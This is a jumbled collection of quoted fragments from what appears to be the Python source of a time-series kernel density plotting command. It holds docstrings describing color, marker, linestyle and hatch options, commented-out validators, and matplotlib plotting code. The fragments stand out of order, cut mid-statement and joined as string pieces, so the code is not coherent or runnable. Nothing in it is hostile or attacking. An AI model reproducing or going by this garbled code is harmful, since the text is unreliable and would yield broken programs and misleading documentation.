down | +-------+----------------+ | ^ | triangle up |", "would normally use the time-series names associated with the input", "override the names in the data set. You must supply", "minimum x value for the entire plot. hlines_xmax: [optional, defaults", "norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. 
lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead.", "\"\" or legend == \"True\" or legend is None) type", "linestyle=l) ytitle = ytitle or \"Density\" if legend is True:", "where 0 is white an 1 is black. 4. Any", "\"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", #", "tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors)", "is not None: icolors = itertools.cycle(colors) else: icolors = None", "a single number will be used as the minimum x", "linestyle code. Separated 'colors', 'linestyles', and 'markerstyles' instead of using", "style. vlines_linestyles: [optional, defaults to None] List of linestyles for", "``type``] Title of y-axis. title : str [optional, defaults to", "\"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], # 1, # ],", "matplotlib line types. Otherwise on the command line a comma", "to False] Make separate subplots for each time series. sharex", "estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename : str [optional,", "list must be same length as `vlines_x`. If None will", "lower limit on the data and set the upper limit", "st in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \")", "os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i in plot_styles", "= tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim,", ": int [optional] Rotation for major labels for bar plots.", "| +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use", "= tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index,", "be same length as `hlines_y`. If None will take from", "on range of y values] Comma separated lower and upper", "entire plot. vlines_colors: [optional, defaults to None] List of colors", "end at the maximum x value for the entire plot.", "[\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int,", "1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\", [True,", "nylim = ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0]", "plotting_position=[ # str, # [ # \"domain\", # [\"weibull\", \"benard\",", "defaults to None] List of minimum y values to start", "hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ # str, # [\"domain\",", "logy is True or norm_xaxis is True or norm_yaxis is", "xy_match_line : str [optional, defaults is ''] Will add a", "of colors for the vertical lines. If a single color", "[optional, default is \"default\"] Set the style of the plot.", "is white an 1 is black. 4. Any of the", "line in enumerate(ax.lines): if icolors is not None: c =", "for all vertical lines. A missing value or None will", "-. 
| dash_dot | +---------+--------------+ | : | dotted |", "colors = tsutils.make_list(colors) if linestyles == \"auto\": linestyles = plotutils.LINE_LIST", "# bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None,", "square | +-------+----------------+ | p | pentagon | +-------+----------------+ |", "or None will start at the minimum x value for", "dots | +-----------------+-------------------+ | * | stars | +-----------------+-------------------+ logx", "used as the linestyle for all vertical lines. If a", "the major ticks. label_rotation : int [optional] Rotation for major", "values where to place a horizontal line. hlines_xmin: [optional, defaults", "List of minimum x values to start the horizontal line.", "logx = True if yaxis == \"log\": logy = True", "'--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str", "to None] Legend would normally use the time-series names associated", "is not None: c = next(icolors) else: c = None", "hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) #", "to 'steps-pre' and is maintained for backward-compatibility. ACCEPTS:: ['default' |", "Currently the 'style' option will override the others. Comma separated", "[\"domain\", [\"auto\", None, \"\", \" \", \" \"] + plotutils.LINE_LIST],", "[\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1],", "of the plot. See `xlim` for examples. xaxis : str", "the type, for example 'filename.png' will create a PNG file.", "maximum x values to end each horizontal line. If a", "| dotted | +---------+--------------+ | None | draw nothing |", "style useful for photo-copyable black, white, nd gray. Matplotlib styles:", "tsutils.make_list(markerstyles) if markerstyles is None: markerstyles = \" \" if", "| ``+`` | plus | +-------+----------------+ | x | x", "# \"classic\", # \"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\",", "For example, '--xlim 1,1000' would limit the plot from 1", "None will take from the color pallette in the current", "[\"pass\", []], None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\",", "if using the Python API. To not display lines use", "| r | red | +------+---------+ | c | cyan", "markerstyles = \" \" if style != \"auto\": nstyle =", "chart size to fit in a column of the \"IEEE\"", "used if ``type`` \"lag_plot\" is chosen. xtitle : str [optional,", "Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are", "will be used as the minimum x values for all", "of the various time-series automatically. scatter_matrix_diagonal : str [optional, defaults", "list. vlines_x: [optional, defaults to None] List of x values", "black. 4. Any of the HTML color names. +------------------+ |", "marker. bar_hatchstyles [optional, default to \"auto\", only used if type", "the characteristics of the previous. 
Color Blind Appropriate Styles The", "drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag,", "Just combine codes in 'ColorMarkerLine' order, for example 'r*--' is", "style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [", "\"fivethirtyeight\", # \"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\", #", "is not None: l = next(ilinestyles) else: l = None", "yaxis == \"log\": logy = True xlim = plotutils.know_your_limits(xlim, axis=xaxis)", "style. 2. Single character code from the table below. +------+---------+", "The number of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use", "is False] Whether to plot grid lines on the major", "of the random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults", "skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None,", "deprecated. * * For --logx use --xaxis=\"log\" * For --logy", "= None if c is not None: plt.setp(line, color=c) plt.setp(line,", "str [optional, defaults is ''] Will add a match line", "will be used as the linestyle for all vertical lines.", "as the linestyle code. Separated 'colors', 'linestyles', and 'markerstyles' instead", "vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1],", "= nylim[1] if type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\",", "color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\"", "True or norm_xaxis is True or norm_yaxis is True or", "[\"domain\", [True, False]], 1], # sharey=[bool, [\"domain\", [True, False]], 1],", "default is 'descending'] How to sort the values for the", "appropriate for black, white, and gray, however the \"ieee\" also", "to 'kde'] If plot type is 'scatter_matrix', this specifies the", "color names. +------------------+ | HTML Color Names | +==================+ |", "tri_down | +-------+----------------+ | 2 | tri_up | +-------+----------------+ |", "length as `hlines_y`. If a single number will be the", "names in the data set. You must supply a comma", "color for all horizontal lines. If a list must be", "\"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", #", "number will be the maximum x value for all horizontal", "| +-------+----------------+ | 2 | tri_up | +-------+----------------+ | 3", "the horizontal lines. If a single linestyle then will be", "Code | Lines | +=========+==============+ | ``-`` | solid |", "gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults", "None | draw nothing | +---------+--------------+ | ' ' |", "each horizontal line. If a list must be same length", "True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None:", "lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type}", "white, nd gray. 
Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y:", "where to place a horizontal line. hlines_xmin: [optional, defaults to", "| +---------+--------------+ | -- | dashed | +---------+--------------+ | -.", "| +-------+----------------+ | o | circle | +-------+----------------+ | v", "\"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\", #", "None] List of minimum x values to start the horizontal", "matplotlib hatch types. Otherwise on the command line a comma", "weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names}", "| draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional,", "if linestyles == \"auto\": linestyles = plotutils.LINE_LIST else: linestyles =", "c is not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l)", "[optional, default is 'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis,", "yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis,", "depends on ``type``] Title of x-axis. ytitle : str [optional,", "length as `hlines_y`. If None will take for the standard", "using the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description |", "por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles,", "| g | green | +------+---------+ | r | red", "ofilename : str [optional, defaults to 'plot.png'] Output filename for", "norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False,", "x value for the entire plot. hlines_colors: [optional, defaults to", "False]], 1], # label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\",", "hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density", "| ``\\`` | back diagonal | +-----------------+-------------------+ | ``|`` |", "code. Separated 'colors', 'linestyles', and 'markerstyles' instead of using the", "will take for the standard linestyles list. \"\"\" plt =", "y-axis. plotting_position : str [optional, default is 'weibull'] {plotting_position_table} Only", "the plot from 1 to 1000, where '--xlim ,1000' would", "to end each vertical line. If a list must be", "linestyle for all vertical lines. If a list must be", "imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar,", "iterate through the available matplotlib hatch types. Otherwise on the", "hlines_xmax = nxlim[1] if vlines_x is not None: vlines_x =", "): r\"\"\"Kernel density estimation of probability density function. \"kde\" will", "\"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]:", "value for all vertical lines. A missing value or None", "the input data. 
The 'legend_names' option allows you to override", "bar plots. label_skip : int [optional] Skip for major labels", "# ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]],", "more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\",", "Comma separated matplotlib style strings per time-series. Just combine codes", "a PNG file. If used within Python, and `ofilename` is", "the horizontal line. If a list must be same length", "| . | point | +-------+----------------+ | o | circle", "data.\"\"\" # Need to work around some old option defaults", "the probability density function based on the data called kernel", "* For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\"", "A missing value or None will end at the maximum", "# xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]],", "None will take for the standard linestyles list. vlines_x: [optional,", "for each time-series in the data set. subplots [optional, defaults", "in the data set. subplots [optional, defaults to False] Make", "[optional, default is 'descending'] How to sort the values for", "\" \"] + plotutils.LINE_LIST], # None, # ], # )", "to have the same number of style strings as time-series", "is ''] Will add a match line where x ==", "minimum x values for all horizontal lines. A missing value", "names associated with the input data. The 'legend_names' option allows", "[\"pass\", []], None], # vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[", "| d | thin diamond | +-------+----------------+ | _ |", "| +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to '", "used if type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"]", "blindness. Black, White, and Gray Styles The \"ieee\" style is", "None] List of colors for the horizontal lines. If a", "is None will return the Matplotlib figure that can then", "[\"pass\", []], 1], # title=[str, [\"pass\", []], 1], # figsize=[float,", "is another style useful for photo-copyable black, white, nd gray.", "horizontal lines. A missing value or None will start at", "# title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\", [0, None]],", "None] Still available, but if None is replaced by 'colors',", "[optional, defaults to None] List of minimum x values to", "# str, # [ # \"domain\", # [ # \"classic\",", "= os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc,", "``*`` | star | +-------+----------------+ | h | hexagon1 |", "if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis()", "pallette in the current plot style. vlines_linestyles: [optional, defaults to", "point | +-------+----------------+ | o | circle | +-------+----------------+ |", "| +------+---------+ | c | cyan | +------+---------+ | m", "and \"retro\". If multiple styles then each over rides some", "or legend == \"True\" or legend is None) type =", "to None] List of linestyles for the horizontal lines. If", "Otherwise on the command line a comma separated list, or", "lines. A missing value or None will start at the", "lnames = plotutils.check(type, tsd, legend_names) # This is to help", "is replaced by 'colors', 'linestyles', and 'markerstyles' options. 
Currently the", "scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation,", "os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i + \".mplstyle\")", "markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y,", "# \"science\", # \"grid\", # \"ieee\", # \"scatter\", # \"notebook\",", "scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None,", "| +-------+----------------+ | None | nothing | +-------+----------------+ | '", "H | hexagon2 | +-------+----------------+ | ``+`` | plus |", "matplotlib style strings per time-series. Just combine codes in 'ColorMarkerLine'", "styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all styles", "plot. hlines_xmax: [optional, defaults to None] List of maximum x", "each time-series in the data set. subplots [optional, defaults to", "@tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],],", "input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\",", "| s | square | +-------+----------------+ | p | pentagon", "of x values] Comma separated lower and upper limits for", "subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy,", "number of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"'", "`xlim` for examples. xaxis : str [optional, default is 'arithmetic']", "[\"pass\", []], 1], # ytitle=[str, [\"pass\", []], 1], # title=[str,", "to \"auto\", only used if type equal to \"bar\", \"barh\",", "the x-axis of the plot. For example, '--xlim 1,1000' would", "ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\", []], 1], #", "style [optional, default is None] Still available, but if None", "[optional] Skip for major labels for bar plots. drawstyle :", "# \"muted\", # \"retro\", # ], # ], # None,", "a list of strings if using the Python API. Separated", "| ``*`` | star | +-------+----------------+ | h | hexagon1", "FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date,", "| horizontal | +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+", "\"auto\", only used if type equal to \"bar\", \"barh\", \"bar_stacked\",", "| +-------+----------------+ | H | hexagon2 | +-------+----------------+ | ``+``", "start the horizontal line. If a list must be same", "in the data set. 
You must supply a comma separated", "\"grayscale\" is another style useful for photo-copyable black, white, nd", "# hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\", []], None],", "``\\`` | back diagonal | +-----------------+-------------------+ | ``|`` | vertical", "# drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\", [True, False]],", "based on range of x values] Comma separated lower and", "plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None: plt.savefig(ofilename) return", "None], # hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\", []],", "2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\",", "[\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], #", "style strings per time-series. Just combine codes in 'ColorMarkerLine' order,", "try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower()", "chosen style. At the command line supply a comma separated", "| +------+---------+ | r | red | +------+---------+ | c", "| +------+---------+ | g | green | +------+---------+ | r", "legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True, False]], 1],", "y values] Comma separated lower and upper limits for the", "lines on the major ticks. label_rotation : int [optional] Rotation", ": str [optional, defaults to ''] Title of chart. figsize", "False]], 1], # legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\",", "--norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are deprecated. *", "force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None,", "| dots | +-----------------+-------------------+ | * | stars | +-----------------+-------------------+", "'kde'] If plot type is 'scatter_matrix', this specifies the plot", "plot_styles = [ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i", "\"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], #", "# plotting_position=[ # str, # [ # \"domain\", # [\"weibull\",", "Still available, but if None is replaced by 'colors', 'linestyles',", "| large circle | +-----------------+-------------------+ | . | dots |", "of # mando legend = bool(legend == \"\" or legend", "end each vertical line. If a list must be same", "None], # hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ # str,", "= tsutils.make_list(markerstyles) if markerstyles is None: markerstyles = \" \"", "\"barh_stacked\"] If 'auto' will iterate through the available matplotlib hatch", "Defines the type of the xaxis. One of 'arithmetic', 'log'.", "1], # secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\",", "subplots=True, share y axis. colors [optional, default is 'auto'] The", "\") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None: linestyles", "' | draw nothing | +---------+--------------+ | '' | draw", "n=2) _, ax = plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]:", "| +------+---------+ | k | black | +------+---------+ 3. Number", "to False] In case subplots=True, share y axis. 
colors [optional,", "ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey,", "= plotutils.check(type, tsd, legend_names) # This is to help pretty", "the command line a comma separated list, or a list", "(KDE). {ydata} Parameters ---------- {input_ts} ofilename : str [optional, defaults", "# \"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\",", "then each over rides some or all of the characteristics", "[\"domain\", [True, False]], 1], # plotting_position=[ # str, # [", "ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\",", "| tri_right | +-------+----------------+ | 8 | octagon | +-------+----------------+", "o | circle | +-------+----------------+ | v | triangle down", "* The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis", "not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle =", "to 1000. ylim [optional, default is based on range of", "styles that are setup to be able to be distinguished", "separate subplots for each time series. sharex [optional, default to", "None] List of x values where to place a vertical", "| cyan | +------+---------+ | m | magenta | +------+---------+", "\"\", \" \", \" \"] + plotutils.HATCH_LIST], None], # style=[str,", "to None] Number or list of y values where to", "which has {} style strings, but you have {} time-series.", "xaxis. One of 'arithmetic', 'log'. yaxis : str [optional, default", "# \"bright\", # \"vibrant\", # \"muted\", # \"retro\", # ],", "are setup to be able to be distinguished by someone", "| +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+ | x", "vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []],", "[]], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str,", "source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None,", "== 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST:", "How to sort the values for the probability plots. Only", "| None | draw nothing | +---------+--------------+ | ' '", "'colors', 'linestyles', and 'markerstyles' options. Currently the 'style' option will", "{end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units} {round_index} plot_styles: str", "x values for all horizontal lines. A missing value or", "vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need", "+------+---------+ | m | magenta | +------+---------+ | y |", "the y-axis of the plot. See `xlim` for examples. xaxis", "a space (' ') as the linestyle code. 
Separated 'colors',", "\"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\",", "hlines_xmin: [optional, defaults to None] List of minimum x values", "vlines_colors: [optional, defaults to None] List of colors for the", "+=================+===================+ | / | diagonal hatching | +-----------------+-------------------+ | ``\\``", "strings per time-series. Just combine codes in 'ColorMarkerLine' order, for", "to 50] The size of the random subset for 'bootstrap'", "(2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\"", "+-------+----------------+ | o | circle | +-------+----------------+ | v |", "Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\",", "use the time-series names associated with the input data. The", "tsutils.error_wrapper( \"\"\" You have to have the same number of", "| tri_down | +-------+----------------+ | 2 | tri_up | +-------+----------------+", "x values to start the horizontal line. If a list", "[\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax,", "| +-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+ |", "dashed | +---------+--------------+ | -. | dash_dot | +---------+--------------+ |", "at the minimum x value for the entire plot. vlines_ymax:", "type is 'scatter_matrix', this specifies the plot along the diagonal.", "* --lognorm_yaxis options are deprecated. * * For --logx use", "# vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[ # str, #", "weibull_yaxis. prob_plot_sort_values : str [optional, default is 'descending'] How to", "You supplied '{}' for style which has {} style strings,", "different ways. 1. Use 'CN' where N is a number", "color from the current style. 2. Single character code from", "sharex [optional, default to True] In case subplots=True, share x", "by someone with color blindness. Black, White, and Gray Styles", "red | +------+---------+ | c | cyan | +------+---------+ |", "(' ') as the linestyle code. Separated 'colors', 'linestyles', and", "the data set. subplots [optional, defaults to False] Make separate", "| + | crossed | +-----------------+-------------------+ | x | crossed", "\"science\", # \"grid\", # \"ieee\", # \"scatter\", # \"notebook\", #", "the manipulation of time series.\"\"\" from __future__ import absolute_import, division,", "pandas as pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import", "\"ieee\" also will change the chart size to fit in", "| +-----------------+-------------------+ | . | dots | +-----------------+-------------------+ | *", "plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join(", "if type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If", "= tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST else:", "^ | triangle up | +-------+----------------+ | < | triangle", "nxlim[1] if vlines_x is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin", "a comma separated list, or a list of strings if", "labels for bar plots. 
drawstyle : str [optional, default is", "Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' '] The", "hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\",", "[\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str,", "in markerstyles] if colors is not None: icolors = itertools.cycle(colors)", "warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None,", "4 | tri_right | +-------+----------------+ | 8 | octagon |", "used as the minimum x values for all vertical lines.", "tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim()", "the vertical lines. If a single color then will be", "default is None] Still available, but if None is replaced", "black | +------+---------+ 3. Number between 0 and 1 that", "| point | +-------+----------------+ | o | circle | +-------+----------------+", "| +-------+----------------+ | D | diamond | +-------+----------------+ | d", "[\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1],", "+-------+----------------+ | 2 | tri_up | +-------+----------------+ | 3 |", "# mando legend = bool(legend == \"\" or legend ==", "xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]],", "y values where to place a horizontal line. hlines_xmin: [optional,", "i for i in linestyles] markerstyles = [\" \" if", "chartreuse | +------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html", "\"] + plotutils.LINE_LIST], # None, # ], # ) def", "| +-----------------+-------------------+ | O | large circle | +-----------------+-------------------+ |", "plt.legend(loc=\"best\") if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin", "\"grid\", # \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", #", "# hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []], None],", "is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax", "limit the plot from 1 to 1000, where '--xlim ,1000'", "\"descending\"]], 1], # plot_styles=[ # str, # [ # \"domain\",", "False] Make separate subplots for each time series. sharex [optional,", "False]], 1], # mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str,", "| 'steps-pre' | 'steps-mid' | 'steps-post'] por [optional] Plot from", "to display the legend. legend_names : str [optional, defaults to", "None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \"", "If a single linestyle then will be used as the", "linestyles list. vlines_x: [optional, defaults to None] List of x", "marker. If 'auto' will iterate through the available matplotlib marker", "with lines. The steps variants produce step-plots. 
